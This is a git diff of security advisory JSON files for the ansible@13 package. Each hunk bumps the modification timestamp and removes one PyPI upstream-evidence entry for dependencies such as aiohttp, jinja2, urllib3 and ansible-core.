--git a/advisories/BREW-ansible@13-CVE-2023-49082.json b/advisories/BREW-ansible@13-CVE-2023-49082.json index 12fabae86a2..1706cac3fc5 100644 --- a/advisories/BREW-ansible@13-CVE-2023-49082.json +++ b/advisories/BREW-ansible@13-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-49082", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-5115.json b/advisories/BREW-ansible@13-CVE-2023-5115.json index 44c731d3756..982220af330 100644 --- a/advisories/BREW-ansible@13-CVE-2023-5115.json +++ b/advisories/BREW-ansible@13-CVE-2023-5115.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-5115", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jpvw-p8pr-9g2x", "CVE-2023-5115", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-5764.json b/advisories/BREW-ansible@13-CVE-2023-5764.json index 51054d0ee95..9817af4d425 100644 --- a/advisories/BREW-ansible@13-CVE-2023-5764.json +++ b/advisories/BREW-ansible@13-CVE-2023-5764.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-5764", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-7j69-qfc3-2fq9", "CVE-2023-5764", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-0690.json b/advisories/BREW-ansible@13-CVE-2024-0690.json index 1b839644d7c..ae3d851b616 100644 --- a/advisories/BREW-ansible@13-CVE-2024-0690.json +++ b/advisories/BREW-ansible@13-CVE-2024-0690.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-0690", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h24r-m9qc-pvpg", "CVE-2024-0690", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-11079.json b/advisories/BREW-ansible@13-CVE-2024-11079.json index dafeae4e42f..d441d7ab3f5 100644 --- a/advisories/BREW-ansible@13-CVE-2024-11079.json +++ b/advisories/BREW-ansible@13-CVE-2024-11079.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-11079", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-99w6-3xph-cx78", "CVE-2024-11079", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-22195.json b/advisories/BREW-ansible@13-CVE-2024-22195.json index f79645636ff..aedb9f28db4 100644 --- a/advisories/BREW-ansible@13-CVE-2024-22195.json +++ b/advisories/BREW-ansible@13-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-22195", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-23334.json b/advisories/BREW-ansible@13-CVE-2024-23334.json index 74a45518861..7f4f643ab55 100644 --- a/advisories/BREW-ansible@13-CVE-2024-23334.json +++ b/advisories/BREW-ansible@13-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-23334", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-23829.json b/advisories/BREW-ansible@13-CVE-2024-23829.json index c332496141d..152fd9b2811 100644 --- a/advisories/BREW-ansible@13-CVE-2024-23829.json +++ b/advisories/BREW-ansible@13-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-23829", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-27306.json b/advisories/BREW-ansible@13-CVE-2024-27306.json index 10d4ff96569..15742b730b8 100644 --- a/advisories/BREW-ansible@13-CVE-2024-27306.json +++ b/advisories/BREW-ansible@13-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-27306", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-30251.json b/advisories/BREW-ansible@13-CVE-2024-30251.json index c8bb71e237c..ca19c422a8c 100644 --- a/advisories/BREW-ansible@13-CVE-2024-30251.json +++ b/advisories/BREW-ansible@13-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-30251", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-34064.json b/advisories/BREW-ansible@13-CVE-2024-34064.json index 429a956e929..3372ff77688 100644 --- a/advisories/BREW-ansible@13-CVE-2024-34064.json +++ b/advisories/BREW-ansible@13-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-34064", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-35195.json b/advisories/BREW-ansible@13-CVE-2024-35195.json index 2b8733ea82f..1b9da6f548a 100644 --- a/advisories/BREW-ansible@13-CVE-2024-35195.json +++ b/advisories/BREW-ansible@13-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-35195", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-3651.json b/advisories/BREW-ansible@13-CVE-2024-3651.json index 8364a74dd8e..9bf28caf914 100644 --- a/advisories/BREW-ansible@13-CVE-2024-3651.json +++ b/advisories/BREW-ansible@13-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-3651", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-37891.json b/advisories/BREW-ansible@13-CVE-2024-37891.json index 1f4335bb736..26c97c2ebf9 100644 --- a/advisories/BREW-ansible@13-CVE-2024-37891.json +++ b/advisories/BREW-ansible@13-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-37891", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-42367.json b/advisories/BREW-ansible@13-CVE-2024-42367.json index bfcfb2983d5..2b621bc162b 100644 --- a/advisories/BREW-ansible@13-CVE-2024-42367.json +++ b/advisories/BREW-ansible@13-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-42367", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-47081.json b/advisories/BREW-ansible@13-CVE-2024-47081.json index beb2d852653..8937aea1b23 100644 --- a/advisories/BREW-ansible@13-CVE-2024-47081.json +++ b/advisories/BREW-ansible@13-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-47081", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-52303.json b/advisories/BREW-ansible@13-CVE-2024-52303.json index 4fa37643583..00f69c418a5 100644 --- a/advisories/BREW-ansible@13-CVE-2024-52303.json +++ b/advisories/BREW-ansible@13-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-52303", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-52304.json b/advisories/BREW-ansible@13-CVE-2024-52304.json index 2f15aa63ba6..4c39053d784 100644 --- a/advisories/BREW-ansible@13-CVE-2024-52304.json +++ b/advisories/BREW-ansible@13-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-52304", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-56201.json b/advisories/BREW-ansible@13-CVE-2024-56201.json index a744314258a..039196924c1 100644 --- a/advisories/BREW-ansible@13-CVE-2024-56201.json +++ b/advisories/BREW-ansible@13-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-56201", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-56326.json b/advisories/BREW-ansible@13-CVE-2024-56326.json index f4e95367c99..bf18531a6b8 100644 --- a/advisories/BREW-ansible@13-CVE-2024-56326.json +++ b/advisories/BREW-ansible@13-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-56326", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-6345.json b/advisories/BREW-ansible@13-CVE-2024-6345.json index 88370595b9f..9f0386bd61f 100644 --- a/advisories/BREW-ansible@13-CVE-2024-6345.json +++ b/advisories/BREW-ansible@13-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-6345", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-8775.json b/advisories/BREW-ansible@13-CVE-2024-8775.json index c11cacda77f..a876d39bed6 100644 --- a/advisories/BREW-ansible@13-CVE-2024-8775.json +++ b/advisories/BREW-ansible@13-CVE-2024-8775.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-8775", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jpxc-vmjf-9fcj", "CVE-2024-8775", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-9902.json b/advisories/BREW-ansible@13-CVE-2024-9902.json index 3b6d4a2fdca..9ba1d34a916 100644 --- a/advisories/BREW-ansible@13-CVE-2024-9902.json +++ b/advisories/BREW-ansible@13-CVE-2024-9902.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-9902", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-32p4-gm2c-wmch", "CVE-2024-9902", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-14010.json b/advisories/BREW-ansible@13-CVE-2025-14010.json index e6e83e7f855..34f1642a012 100644 --- a/advisories/BREW-ansible@13-CVE-2025-14010.json +++ b/advisories/BREW-ansible@13-CVE-2025-14010.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-14010", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8ggh-xwr9-3373", "CVE-2025-14010", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-27516.json b/advisories/BREW-ansible@13-CVE-2025-27516.json index 55959e0590e..2d1ed0709e0 100644 --- a/advisories/BREW-ansible@13-CVE-2025-27516.json +++ b/advisories/BREW-ansible@13-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-27516", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-47273.json b/advisories/BREW-ansible@13-CVE-2025-47273.json index bc5187fc31e..02818149206 100644 --- a/advisories/BREW-ansible@13-CVE-2025-47273.json +++ b/advisories/BREW-ansible@13-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-47273", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-50181.json b/advisories/BREW-ansible@13-CVE-2025-50181.json index cdad1457497..e450a880635 100644 --- a/advisories/BREW-ansible@13-CVE-2025-50181.json +++ b/advisories/BREW-ansible@13-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-50181", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-50182.json b/advisories/BREW-ansible@13-CVE-2025-50182.json index 9159fd083d1..e9324ea3248 100644 --- a/advisories/BREW-ansible@13-CVE-2025-50182.json +++ b/advisories/BREW-ansible@13-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-50182", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-53643.json b/advisories/BREW-ansible@13-CVE-2025-53643.json index 82593f296db..96caff36564 100644 --- a/advisories/BREW-ansible@13-CVE-2025-53643.json +++ b/advisories/BREW-ansible@13-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-53643", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-61911.json b/advisories/BREW-ansible@13-CVE-2025-61911.json index 454e5a35586..5387d923fb1 100644 --- a/advisories/BREW-ansible@13-CVE-2025-61911.json +++ b/advisories/BREW-ansible@13-CVE-2025-61911.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-61911", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r7r6-cc7p-4v5m", "CVE-2025-61911", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-61912.json b/advisories/BREW-ansible@13-CVE-2025-61912.json index 59506dd0766..06d7a0f7390 100644 --- a/advisories/BREW-ansible@13-CVE-2025-61912.json +++ b/advisories/BREW-ansible@13-CVE-2025-61912.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-61912", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p34h-wq7j-h5v6", "CVE-2025-61912", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-66418.json b/advisories/BREW-ansible@13-CVE-2025-66418.json index 32b3aac88c4..8e99c974d65 100644 --- a/advisories/BREW-ansible@13-CVE-2025-66418.json +++ b/advisories/BREW-ansible@13-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-66418", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-66471.json b/advisories/BREW-ansible@13-CVE-2025-66471.json index 37915e77977..b6c48efe8e4 100644 --- a/advisories/BREW-ansible@13-CVE-2025-66471.json +++ b/advisories/BREW-ansible@13-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-66471", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69223.json b/advisories/BREW-ansible@13-CVE-2025-69223.json index 4253715a8ba..775d7950392 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69223.json +++ b/advisories/BREW-ansible@13-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69223", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", 